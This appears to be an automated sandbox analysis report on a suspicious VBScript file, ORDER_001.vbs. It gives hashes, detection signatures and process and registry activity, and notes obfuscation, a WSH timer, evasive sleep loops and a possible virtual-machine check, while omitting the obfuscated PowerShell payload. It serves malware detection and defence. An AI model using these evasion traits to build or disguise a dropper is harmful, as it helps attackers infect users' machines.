Windows Analysis Report
ORDER_001.vbs

Overview

General Information

Sample name: ORDER_001.vbs
Analysis ID: 1523163
MD5: 2da95c45a16570fe5a54d7d69c0a4660
SHA1: 47686ceac80fef7a3b5402ca2f72e09d1b5827f8
SHA256: 3e18c135dee79e6de78802901e67f1115d4c39ba4a197981543169fed415181f
Tags: vbsuser-abuse_ch
Infos:

Detection

Score: 22
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.4617158163.0000017068E89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5b77d2ef9b
Source: ORDER_001.vbs Initial sample: Strings found which are bigger than 50
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [long obfuscated PowerShell string omitted]
Source: wscript.exe, 00000000.00000003.2143121862.000001706B056000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129902609.0000017068F23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2145657324.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130162482.000001706ADEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617443544.000001706AEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2146391333.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2145248851.000001706B05C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129723315.000001706ADC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617568963.000001706B060000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2143761707.000001706B05B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2129864207.000001706ADC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Arbejdsvgring = Arbejdsvgring & ".Sln"
Source: wscript.exe, 00000000.00000003.2143247519.000001706B037000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .Sln@
Source: wscript.exe, 00000000.00000002.4617443544.000001706AF87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [long obfuscated PowerShell string omitted]
Source: classification engine Classification label: sus22.winVBS@1/2@0/0
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER_001.vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 1460 Thread sleep time: -30000s >= -30000s
Source: wscript.exe, 00000000.00000002.4617158163.0000017068F66000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.4617443544.000001706AF87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2141288275.000001706AF87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142292945.000001706AF87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2141871319.000001706AF87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
No contacted IP infos